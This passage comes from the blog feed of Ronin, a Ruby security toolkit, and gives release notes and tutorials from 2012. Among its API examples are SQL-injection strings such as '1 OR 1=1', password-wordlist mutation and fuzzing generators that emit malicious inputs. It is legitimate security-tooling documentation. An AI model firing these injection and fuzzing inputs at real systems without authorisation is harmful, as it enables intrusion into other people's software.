<li><a href="https://github.com/downloads/ronin-rb/ronin-gen/ronin-gen-1.2.0.rc2.gem.asc">PGP</a></li>
</ul>
</li>
</ul>
<h3 id="changelogs">ChangeLogs</h3>
<ul>
<li><a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/ChangeLog.md#050--2012-05-28">ronin-support 0.5.0</a></li>
<li><a href="https://github.com/ronin-rb/ronin/blob/1.5.0/ChangeLog.md#150--2012-05-28">ronin 1.5.0</a></li>
<li><a href="https://github.com/ronin-rb/ronin-gen/blob/1.2.0/ChangeLog.md#120--2012-05-28">ronin-gen 1.2.0</a></li>
</ul>
<h3 id="how-can-you-help">How Can You Help?</h3>
<p>We would love your help testing these release candidates.
Here are some things you can do:</p>
<ol>
<li>
<p>Install the Gems:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ gem install ronin-support ronin ronin-gen --pre
</code></pre></div> </div>
</li>
<li>Test the new code, such as <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/integer.rb#L90-127">Integer#pack</a>, <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/float.rb#L24-49">Float#pack</a>, <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/array.rb#L26-51">Array#pack</a>,
<a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/array.rb#L26-51">String#unpack</a>, <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/binary/struct.rb#L26-49">Ronin::Binary::Struct</a>, <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/network/tcp/proxy.rb#L27-76">Ronin::Network::TCP::Proxy</a>
(<a href="https://gist.github.com/2657303">example</a>) and <a href="https://github.com/ronin-rb/ronin-support/blob/0.5.0/lib/ronin/network/udp/proxy.rb#L30">Ronin::Network::UDP::Proxy</a> (<a href="https://gist.github.com/2919927">example</a>).</li>
<li>Test the new commands, such as <a href="https://github.com/ronin-rb/ronin/blob/1.5.0/lib/ronin/ui/cli/commands/net/proxy.rb#L31-75">ronin-net-proxy</a>.</li>
<li>
<p>Review the new man-pages.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ ronin-help wordlist
</code></pre></div> </div>
</li>
<li>
<p>Review the documentation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ yard server -g -d
$ $BROWSER http://localhost:8808/docs/ronin-support/0.5.0.rc2/frames
$ $BROWSER http://localhost:8808/docs/ronin/1.5.0.rc2/frames
$ $BROWSER http://localhost:8808/docs/ronin-gen/1.2.0.rc2/frames
</code></pre></div> </div>
</li>
</ol>
Installing Ronin on BackTrack Linux 5r22012-04-19 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/04/19/installing-ronin-on-backtrack-linux.html<p><a href="http://www.backtrack-linux.org/">BackTrack Linux</a> 5r2 was <a href="http://www.backtrack-linux.org/backtrack/backtrack-5-r2-released/">released</a> on March 1st, and ships with
newer versions of just about everything. So I thought it was high time that
we did a blog post on howto install Ronin on BackTrack Linux (BT) 5.</p>
<p>What is particularly nice about BT 5, is it ships with Ruby 1.9.2 and a few
common RubyGems (<code class="language-plaintext highlighter-rouge">bundler</code>, <code class="language-plaintext highlighter-rouge">rails</code>, etc). Also, the few libraries/header-files
which Ronin needs for installation (particularly <code class="language-plaintext highlighter-rouge">libsqlite3</code>)
were already installed. This made installing Ronin on BT 5 as simple as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem install ronin
</code></pre></div></div>
<p>This will install Ronin and drop the <code class="language-plaintext highlighter-rouge">ronin</code> executable into
<code class="language-plaintext highlighter-rouge">/etc/alternatives/gem-bin/</code>. Now you should be able to start the Ronin console:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ronin
>> VERSION
=> "1.4.1"
>> !uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
=> true
</code></pre></div></div>
Parsing URIs is easy2012-03-15 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/03/15/parsing-uris-is-easy.html<p>Despite what others may <a href="https://community.rapid7.com/community/metasploit/blog/2012/03/12/uri-parsing-its-harder-than-you-think">say</a>, parsing URIs is <em>not</em> hard.</p>
<p>In fact, Ruby already makes parsing URIs fairly easy with the <code class="language-plaintext highlighter-rouge">URI()</code> method.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">uri</span> <span class="o">=</span> <span class="no">URI</span><span class="p">(</span><span class="s1">'http://www.google.com/search?q=parsing+URIs+is+hard%2C+let%27s+go+shopping&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a'</span><span class="p">)</span>
<span class="c1"># => #<URI::HTTP:0x00000000f94188 URL:http://www.google.com/search?q=parsing+URIs+is+hard%2C+let%27s+go+shopping&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a></span></code></pre></figure>
<h2 id="query-params">Query Params</h2>
<p>Although, the <a href="http://rubydoc.info/stdlib/uri">URI</a> library does not parse the parameters within the query
string. Ronin, like other modern Ruby projects, depends on many other smaller
<a href="http://rubygems.org/">RubyGems</a> for functionality; also so you don’t have to install and require
them by hand. One such RubyGem is <a href="https://github.com/postmodern/uri-query_params#readme">uri-query_params</a>, which allows you to
access the parameters within the query string of <em>any</em> <a href="http://rubydoc.info/stdlib/uri/1.9.2/URI/HTTP">URI::HTTP</a>
(or <a href="http://rubydoc.info/stdlib/uri/1.9.2/URI/HTTPS">URI::HTTPS</a>) object:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">uri</span><span class="p">.</span><span class="nf">query_params</span><span class="p">[</span><span class="s1">'q'</span><span class="p">]</span>
<span class="c1"># => "parsing+URIs+is+hard,+let's+go+shopping"</span>
<span class="n">pp</span> <span class="n">uri</span><span class="p">.</span><span class="nf">query_params</span>
<span class="c1"># {"q"=>"parsing+URIs+is+hard,+let's+go+shopping",</span>
<span class="c1"># "ie"=>"utf-8",</span>
<span class="c1"># "oe"=>"utf-8",</span>
<span class="c1"># "aq"=>"t",</span>
<span class="c1"># "rls"=>"org.mozilla:en-US:unofficial",</span>
<span class="c1"># "client"=>"firefox-a"}</span>
<span class="c1"># => {"q"=>"parsing+URIs+is+hard,+let's+go+shopping", "ie"=>"utf-8", "oe"=>"utf-8", "aq"=>"t", "rls"=>"org.mozilla:en-US:unofficial", "client"=>"firefox-a"}</span></code></pre></figure>
<p>Additionally, you can <a href="http://rubydoc.info/gems/uri-query_params/URI/QueryParams#parse-class_method">parse</a>/<a href="http://rubydoc.info/gems/uri-query_params/URI/QueryParams#dump-class_method">dump</a> individual query strings:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">URI</span><span class="o">::</span><span class="no">QueryParams</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="s2">"q=1&x=2"</span><span class="p">)</span>
<span class="c1"># => {"q" => "1", "x" => "2"}</span>
<span class="no">URI</span><span class="o">::</span><span class="no">QueryParams</span><span class="p">.</span><span class="nf">dump</span><span class="p">(</span><span class="ss">:q</span> <span class="o">=></span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:x</span> <span class="o">=></span> <span class="mi">2</span><span class="p">)</span>
<span class="c1"># => "q=1&x=2"</span></code></pre></figure>
<div class="note">
<p>
The <kbd>URI::QueryParams.dump</kbd> method is also used by
<a href="/docs/ronin-support/Ronin/Network/HTTP.html">HTTP</a>
helper methods for the <kbd>:query_params</kbd> option:
</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">http_get</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=></span> <span class="s1">'example.com'</span><span class="p">,</span> <span class="ss">:path</span> <span class="o">=></span> <span class="s1">'/page.php'</span><span class="p">,</span> <span class="ss">:query_params</span> <span class="o">=></span> <span class="p">{</span><span class="s1">'id'</span> <span class="o">=></span> <span class="s2">"1 OR 1=1"</span><span class="p">})</span></code></pre></figure>
</div>
<h2 id="non-standard-uris">Non-standard URIs</h2>
<p>There are URIs that Ruby has trouble parsing, such as so called
<a href="http://en.wikipedia.org/wiki/Punycode">punycode</a> domains. Not to worry, Ronin also requires the
<a href="https://github.com/sporkmonger/addressable#readme">addressable</a> RubyGem, a URI parsing library on steroids:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">uri</span> <span class="o">=</span> <span class="no">Addressable</span><span class="o">::</span><span class="no">URI</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="s2">"http://www.詹姆斯.com/?q=1"</span><span class="p">)</span>
<span class="c1"># => #<Addressable::URI:0xb525d4 URI:http://www.詹姆斯.com/?q=1></span>
<span class="n">uri</span><span class="p">.</span><span class="nf">normalize</span>
<span class="c1"># => #<Addressable::URI:0xb57bec URI:http://www.xn--8ws00zhy3a.com/?q=1></span></code></pre></figure>
<p>With Ronin, parsing URIs is easy.</p>
Ronin is now on Reddit2012-03-14 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/03/14/ronin-is-now-on-reddit.html<p>Thanks to user suggestion, Ronin is now on <a href="http://reddit.com/r/ronin_ruby">Reddit</a> (with 35 readers so far)!</p>
<p>Send us your links, questions or tips for Ronin or other Ruby hacking.</p>
Ronin 1.4.0 released2012-02-17 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/02/17/ronin-1-4-0-released.html<p>After many months of development and release candidates I am pleased to announce
that <a href="/docs/ronin-support/">ronin-support</a> <a href="/docs/ronin-support/file.ChangeLog.html">0.4.0</a>, <a href="/docs/ronin/">ronin</a> <a href="/docs/ronin/file.ChangeLog.html">1.4.0</a> and
<a href="/docs/ronin-gen/">ronin-gen</a> <a href="/docs/ronin-gen/file.ChangeLog.html">1.1.0</a> have been released.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem update ronin-support ronin ronin-gen
</code></pre></div></div>
<p>So what’s new?</p>
<h2 id="ronin-support-040">ronin-support 0.4.0</h2>
<h3 id="common-regular-expressions">Common Regular Expressions</h3>
<p>Many common and useful Regular Expressions constants were added to the
<a href="/docs/ronin-support/Regexp.html">Regexp</a> class.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"Please see C:</span><span class="se">\\</span><span class="s2">Documents</span><span class="se">\\</span><span class="s2">plans.docx"</span><span class="p">.</span><span class="nf">scan</span><span class="p">(</span><span class="no">Regexp</span><span class="o">::</span><span class="no">ABSOLUTE_WINDOWS_PATH</span><span class="p">)</span>
<span class="c1"># => ["C:\\Documents\\plans.docx"]</span></code></pre></figure>
<h3 id="new-string-methods">New String methods</h3>
<p><a href="/docs/ronin-support/String.html#repeating-instance_method">String#repeating</a> was added which allows creating multiple repeating
Strings:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s1">'A'</span><span class="p">.</span><span class="nf">repeating</span><span class="p">((</span><span class="mi">100</span><span class="o">..</span><span class="mi">700</span><span class="p">).</span><span class="nf">step</span><span class="p">(</span><span class="mi">100</span><span class="p">))</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">str</span> <span class="p">}</span></code></pre></figure>
<p><a href="/docs/ronin-support/String.html#sql_inject-instance_method">String#sql_inject</a> was also added, allowing for easy formatting of SQL
injections:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"'1' OR 1=1"</span><span class="p">.</span><span class="nf">sql_inject</span><span class="p">(</span><span class="ss">:terminate</span> <span class="o">=></span> <span class="kp">true</span><span class="p">)</span>
<span class="c1"># => "1' OR 1=1 --"</span></code></pre></figure>
<h3 id="base64-formatting">Base64 formatting</h3>
<p><a href="/docs/ronin-support/String.html#base64_encode-instance_method">String#base64_encode</a> and <a href="/docs/ronin-support/String.html#base64_decode-instance_method">String#base64_decode</a> now accept formatting
arguments:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="p">(</span><span class="s2">"A"</span> <span class="o">*</span> <span class="mi">256</span><span class="p">).</span><span class="nf">base64_encode</span><span class="p">(</span><span class="ss">:strict</span><span class="p">)</span>
<span class="c1"># => "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"hello world"</span><span class="p">.</span><span class="nf">base64_encode</span><span class="p">(</span><span class="ss">:url</span><span class="p">)</span>
<span class="c1"># => "aGVsbG8gd29ybGQ="</span></code></pre></figure>
<p>These base64 formats are similar to the new methods added to the
<a href="http://rubydoc.info/stdlib/base64/1.9.2/frames">Base64</a> module in Ruby 1.9.</p>
<h3 id="roninfuzzing">ronin/fuzzing</h3>
<p>All fuzzing methods were moved into <code class="language-plaintext highlighter-rouge">ronin/fuzzing</code> and the <a href="/docs/ronin-support/Ronin/Fuzzing.html">Ronin::Fuzzing</a>
namespace. <a href="/docs/ronin-support/Ronin/Fuzzing.html">Ronin::Fuzzing</a> was added which contains fuzzing generator
methods, which generate various types of malicious data. These methods can be
called directly …</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">Fuzzing</span><span class="p">.</span><span class="nf">format_strings</span> <span class="p">{</span> <span class="o">|</span><span class="n">fmt</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">fmt</span> <span class="p">}</span></code></pre></figure>
<p>… or accessed as Enumerators:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">Fuzzing</span><span class="p">[</span><span class="ss">:bad_strings</span><span class="p">]</span>
<span class="c1"># => #<Enumerator: Ronin::Fuzzing:bad_strings></span></code></pre></figure>
<p>The fuzzing generator methods can also be used with <a href="/docs/ronin-support/String.html#fuzz-instance_method">String#fuzz</a>:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"GET /sign_in"</span><span class="p">.</span><span class="nf">fuzz</span><span class="p">(</span><span class="ss">:unix_path</span> <span class="o">=></span> <span class="ss">:bad_paths</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">p</span> <span class="n">str</span> <span class="p">}</span></code></pre></figure>
<p><a href="/docs/ronin-support/String.html#mutate-instance_method">String#mutate</a> was also added to <code class="language-plaintext highlighter-rouge">ronin/fuzzing</code>, which allows for the
incremental mutating of a String, given patterns and substitutions.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"hello old dog"</span><span class="p">.</span><span class="nf">mutate</span><span class="p">(</span><span class="s1">'e'</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'3'</span><span class="p">],</span> <span class="s1">'l'</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'1'</span><span class="p">],</span> <span class="s1">'o'</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'0'</span><span class="p">])</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">str</span> <span class="p">}</span></code></pre></figure>
<h3 id="new-wordlist-class">New Wordlist class</h3>
<p><a href="/docs/ronin-support/Ronin/Wordlist.html">Ronin::Wordlist</a> is a class for building and working with wordlists.</p>
<p>Use an existing Wordlist file:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="s1">'passwords.txt'</span><span class="p">)</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf">each</span> <span class="p">{</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">word</span> <span class="p">}</span></code></pre></figure>
<p>Expand a Wordlist with mutation rules:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="s1">'passwords.txt'</span><span class="p">,</span> <span class="sr">/e/</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'E'</span><span class="p">,</span> <span class="s1">'3'</span><span class="p">],</span> <span class="sr">/a/</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'@'</span><span class="p">])</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf">each</span> <span class="p">{</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">word</span> <span class="p">}</span></code></pre></figure>
<p>Build a Wordlist from arbitrary text:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">build</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf">each_n_words</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">words</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">words</span> <span class="p">}</span></code></pre></figure>
<h3 id="network-modules">Network modules</h3>
<p>As of <a href="/docs/ronin-support/">ronin-support</a> 0.4.0 all <code class="language-plaintext highlighter-rouge">Net</code> convenience methods have been moved
into their respective modules in the <a href="/docs/ronin-support/Ronin/Network.html">Network</a> namespace. One can add the
Network convenience methods to any Class/Module by simply including a Network
module:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/network/http'</span>
<span class="k">class</span> <span class="nc">WordpressFingerprinter</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Network</span><span class="o">::</span><span class="no">HTTP</span>
<span class="nb">attr_accessor</span> <span class="ss">:host</span>
<span class="no">PATH</span> <span class="o">=</span> <span class="s1">'/wp-includes/js/tinymce/tiny_mce.js'</span>
<span class="c1"># @see http://tools.sucuri.net/?page=docs&title=fingerprinting-web-apps</span>
<span class="no">VERSIONS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'a306a72ce0f250e5f67132dc6bcb2ccb'</span> <span class="o">=></span> <span class="s1">'2.0'</span><span class="p">,</span>
<span class="s1">'4f04728cb4631a553c4266c14b9846aa'</span> <span class="o">=></span> <span class="s1">'2.1'</span><span class="p">,</span>
<span class="s1">'25e1e78d5b0c221e98e14c6e8c62084f'</span> <span class="o">=></span> <span class="s1">'2.2'</span><span class="p">,</span>
<span class="s1">'83c83d0f0a71bd57c320d93e59991c53'</span> <span class="o">=></span> <span class="s1">'2.3'</span><span class="p">,</span>
<span class="s1">'7293453cf0ff5a9a4cfe8cebd5b5a71a'</span> <span class="o">=></span> <span class="s1">'2.5'</span><span class="p">,</span>
<span class="s1">'61740709537bd19fb6e03b7e11eb8812'</span> <span class="o">=></span> <span class="s1">'2.6'</span><span class="p">,</span>
<span class="s1">'e6bbc53a727f3af003af272fd229b0b2'</span> <span class="o">=></span> <span class="s1">'2.7'</span><span class="p">,</span>
<span class="s1">'e6bbc53a727f3af003af272fd229b0b2'</span> <span class="o">=></span> <span class="s1">'2.7.1'</span><span class="p">,</span>
<span class="s1">'128e75ed19d49a94a771586bf83265ec'</span> <span class="o">=></span> <span class="s1">'2.9.1'</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">version</span>
<span class="no">VERSIONS</span><span class="p">[</span><span class="n">http_get_body</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=></span> <span class="vi">@host</span><span class="p">,</span> <span class="ss">:path</span> <span class="o">=></span> <span class="no">PATH</span><span class="p">).</span><span class="nf">md5</span><span class="p">]</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<p>Additionally, all Network modules are included into the <a href="/docs/ronin-support/Ronin/Support.html">Ronin::Support</a>
and <a href="/docs/ronin/Ronin.html">Ronin</a> namespaces, so no more having to type “<code class="language-plaintext highlighter-rouge">Net.</code>”:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> tcp_banner 'smtp.gmail.com', 25
=> "220 mx.google.com ESMTP g3sm14650755pbt.41"
</code></pre></div></div>
<h3 id="networkdns">Network::DNS</h3>
<p><a href="/docs/ronin-support/Ronin/Network/DNS.html">Network::DNS</a> was added, which provides simple DNS methods for Ronin.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">dns_lookup</span> <span class="s1">'google.com'</span>
<span class="c1"># => "74.125.224.65"</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">dns_lookup_all</span> <span class="s1">'google.com'</span>
<span class="c1"># => ["74.125.224.128", "74.125.224.131", "74.125.224.130", "74.125.224.136", "74.125.224.132", "74.125.224.129", "74.125.224.142", "74.125.224.133", "74.125.224.137", "74.125.224.134", "74.125.224.135"]</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">dns_reverse_lookup</span> <span class="s1">'74.125.224.65'</span>
<span class="c1"># => "nuq04s07-in-f1.1e100.net"</span></code></pre></figure>
<h3 id="new-network-mixins">New Network Mixins</h3>
<p><a href="/docs/ronin-support/Ronin/Network/Mixins/DNS.html">Network::Mixins::DNS</a> and <a href="/docs/ronin-support/Ronin/Network/Mixins/SSL.html">Network::Mixins::SSL</a> were also added.</p>
<h2 id="ronin-140">ronin 1.4.0</h2>
<h3 id="refactored-roninuiclicommand">Refactored Ronin::UI::CLI::Command</h3>
<p>In <a href="/docs/ronin/">ronin</a> 1.4.0 <a href="/docs/ronin/Ronin/UI/CLI/Command.html">Ronin::UI::CLI::Command</a> (the base-class for all CLI
commands) was refactored to no longer use the <a href="https://github.com/wycats/thor#readme">Thor</a> library.
Now the Command class uses <a href="http://rubydoc.info/gems/parameters/0.4.0/Parameters/Options">Parameters::Options</a>, which combines the
<a href="http://rubydoc.info/gems/parameters/0.4.0/file/README.md">Parameters</a> library with Ruby’s builtin <a href="http://rubydoc.info/stdlib/optparse/1.9.2/OptionParser">OptionParser</a> module.</p>
<p>What resulted from this refactoring was cleaner option syntax and better
<code class="language-plaintext highlighter-rouge">--help</code> output. Take for example the [Wordlist] command:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">class</span> <span class="nc">Wordlist</span> <span class="o"><</span> <span class="no">Command</span>
<span class="n">summary</span> <span class="s1">'Builds and/or mutates Wordlists'</span>
<span class="n">option</span> <span class="ss">:input</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=></span> <span class="no">String</span><span class="p">,</span>
<span class="ss">:flag</span> <span class="o">=></span> <span class="s1">'-i'</span><span class="p">,</span>
<span class="ss">:usage</span> <span class="o">=></span> <span class="s1">'FILE'</span><span class="p">,</span>
<span class="ss">:description</span> <span class="o">=></span> <span class="s1">'Input file'</span>
<span class="n">option</span> <span class="ss">:output</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=></span> <span class="no">String</span><span class="p">,</span>
<span class="ss">:flag</span> <span class="o">=></span> <span class="s1">'-o'</span><span class="p">,</span>
<span class="ss">:usage</span> <span class="o">=></span> <span class="s1">'PATH'</span><span class="p">,</span>
<span class="ss">:description</span> <span class="o">=></span> <span class="s1">'Output wordlist file'</span>
<span class="n">option</span> <span class="ss">:mutations</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=></span> <span class="no">Hash</span><span class="p">[</span><span class="no">String</span> <span class="o">=></span> <span class="no">Array</span><span class="p">],</span>
<span class="ss">:default</span> <span class="o">=></span> <span class="p">{},</span>
<span class="ss">:flag</span> <span class="o">=></span> <span class="s1">'-m'</span><span class="p">,</span>
<span class="ss">:usage</span> <span class="o">=></span> <span class="s1">'STRING:SUB'</span><span class="p">,</span>
<span class="ss">:descriptions</span> <span class="o">=></span> <span class="s1">'Mutations rules'</span>
<span class="n">argument</span> <span class="ss">:template</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=></span> <span class="no">Array</span><span class="p">,</span>
<span class="ss">:description</span> <span class="o">=></span> <span class="s1">'Options word template'</span>
<span class="k">def</span> <span class="nf">execute</span>
<span class="c1"># ...</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<p>Which produces the following <code class="language-plaintext highlighter-rouge">--help</code> output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: ronin wordlist [options] TEMPLATE
Options:
-v, --[no-]verbose Enable verbose output.
-q, --[no-]quiet Disable verbose output.
--[no-]silent Silence all output.
--[no-]color Enables color output.
-i, --input [FILE] Input file.
-o, --output [PATH] Output wordlist file.
-m, --mutations [STRING:SUB] Default: {}
Arguments:
TEMPLATE Options word template
Builds and/or mutates Wordlists
</code></pre></div></div>
<p>It really is that easy to write your own Ronin commands.</p>
<h3 id="old-commands-new-again">Old commands, new again</h3>
<p>The <code class="language-plaintext highlighter-rouge">ronin</code> <code class="language-plaintext highlighter-rouge">install</code>, <code class="language-plaintext highlighter-rouge">update</code> and <code class="language-plaintext highlighter-rouge">uninstall</code> commands have been brought back
in 1.4.0.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin install https://github.com/user/repo.git
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">ronin repos</code> command now only lists installed Repositories.</p>
<h3 id="ronin-console-commands">Ronin Console .commands</h3>
<p>After playing with <a href="http://nodejs.org/">Node.js</a>, I liked how <code class="language-plaintext highlighter-rouge">node</code> console commands were
prefixed with a <code class="language-plaintext highlighter-rouge">.</code> character (ex: <code class="language-plaintext highlighter-rouge">.load</code>). The <code class="language-plaintext highlighter-rouge">.command</code> syntax also does
not conflict with Ruby’s syntax. In 1.4.0 all <code class="language-plaintext highlighter-rouge">!command</code>s can also be called
as <code class="language-plaintext highlighter-rouge">.command</code>s in the Ronin Console:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> .edit myscript.rb
=> true
>> .ping www.google.com
...
</code></pre></div></div>
<h2 id="ronin-gen-110">ronin-gen 1.1.0</h2>
<h3 id="roningengenerator-refactored">Ronin::Gen::Generator refactored</h3>
<p>In <a href="/docs/ronin-gen/">ronin-gen</a> 1.1.0, <a href="/docs/ronin-gen/Ronin/Gen/Generator.html">Ronin::Gen::Generator</a> (the base-class of all
generators) was also refactored to no longer use the <a href="https://github.com/wycats/thor#readme">Thor</a> library.
Instead, all Generators use the <a href="http://rubydoc.info/gems/parameters/0.4.0/file/README.md">Parameters</a> library with Ruby’s builtin
<a href="http://rubydoc.info/stdlib/fileutils/1.9.2/file/README.rdoc">FileUtils</a> module. This change lowers the barrier for writing custom
Ronin Generators.</p>
<p>For an example of the new Generator syntax, please see the <a href="/docs/ronin-gen/Ronin/Gen/Generators/Repository.html">Repository</a>
generator class.</p>
<h3 id="improved-ronin-gen-command">Improved ronin-gen command</h3>
<p>The <code class="language-plaintext highlighter-rouge">ronin-gen</code> command now uses <a href="http://rubydoc.info/gems/parameters/0.4.0/Parameters/Options">Parameters::Options</a> to directly parse
options for the selected Generator. This also improved the <code class="language-plaintext highlighter-rouge">--help</code> output
for all Generators:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin-gen repository --help
ronin-gen repository PATH [options]
--path [PATH] The destination path.
--title [TITLE]
--uri [URI]
--source [SOURCE]
--website [WEBSITE]
--license [LICENSE] Default: "CC-by"
--description [DESCRIPTION] Default: "This is a Ronin Repository"
--authors [AUTHORS [...]] Default: []
--[no-]tests
--[no-]docs
--[no-]svn Create a SVN repository.
--[no-]git Create a Git repository.
--[no-]hg Create a Hg repository.
</code></pre></div></div>
<h3 id="generate-svn-git-hg-repositories">Generate SVN, Git, Hg Repositories</h3>
<p>The <a href="/docs/ronin-gen/Ronin/Gen/Generators/Repository.html">Repository</a> generator now supports generating SVN, Git and Hg
repositories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin-gen repository myrepo --title "My Repository" --hg
</code></pre></div></div>
Ronin Internals Webcast2011-11-04 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2011/11/04/ronin-internals-webcast.html<p>This Saturday (Nov. 5th) we will be giving a webcast on the internals of
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>, <a href="https://github.com/ronin-rb/ronin#readme">ronin</a>, <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> and <a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a>.
The topics that we will cover are:</p>
<ul>
<li>Convenience methods in action</li>
<li>Using the Ronin Database</li>
<li>Ronin Repositories Explained</li>
<li>Ronin Exploits and Payloads</li>
<li>Ronin WebAttacks (LFI, RFI, SQLi)</li>
<li>Ronin PostExploitation API</li>
<li>Ronin Scanners</li>
</ul>
